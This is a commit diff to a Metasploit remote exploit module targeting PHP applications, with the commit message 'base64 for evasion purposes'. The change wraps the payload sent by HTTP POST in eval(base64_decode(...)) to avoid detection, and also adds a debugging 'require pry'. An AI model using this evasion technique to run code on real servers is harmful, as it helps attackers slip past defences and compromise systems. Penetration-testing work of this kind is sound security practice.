base64 for evasion purposes
parent
6c16d2a1ca
commit
46fe0c0899
|
@ -5,6 +5,7 @@
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
require 'pry'
|
||||||
|
|
||||||
class Metasploit4 < Msf::Exploit::Remote
|
class Metasploit4 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
@ -26,7 +27,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'BadChars' => '\x00',
|
'BadChars' => '\x00'
|
||||||
},
|
},
|
||||||
'Platform' => ['php'],
|
'Platform' => ['php'],
|
||||||
'Arch' => ARCH_PHP,
|
'Arch' => ARCH_PHP,
|
||||||
|
@ -46,6 +47,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def http_send_command(code)
|
def http_send_command(code)
|
||||||
|
code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => normalize_uri(target_uri.path),
|
'uri' => normalize_uri(target_uri.path),
|
||||||
|
|
Loading…
Reference in New Issue